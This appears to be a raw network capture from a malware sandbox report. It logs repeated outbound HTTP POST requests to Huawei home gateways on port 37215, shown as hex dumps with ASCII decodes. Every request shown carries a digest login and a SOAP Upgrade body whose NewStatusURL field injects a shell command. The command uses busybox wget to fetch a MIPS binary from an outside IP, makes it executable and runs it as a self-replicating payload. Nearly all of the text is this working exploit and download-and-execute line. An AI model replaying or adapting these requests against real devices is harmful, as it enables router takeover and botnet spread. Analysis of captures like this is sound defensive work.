77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042748928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522614002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2246192.168.2.1341180197.112.193.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.744719982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042747021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522615910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2247192.168.2.1359586196.239.55.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.744766951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042756081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522617102 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2248192.168.2.1351894157.226.157.16837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.744940996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.042761087 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                  May 29, 2024 15:15:25.522614002 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
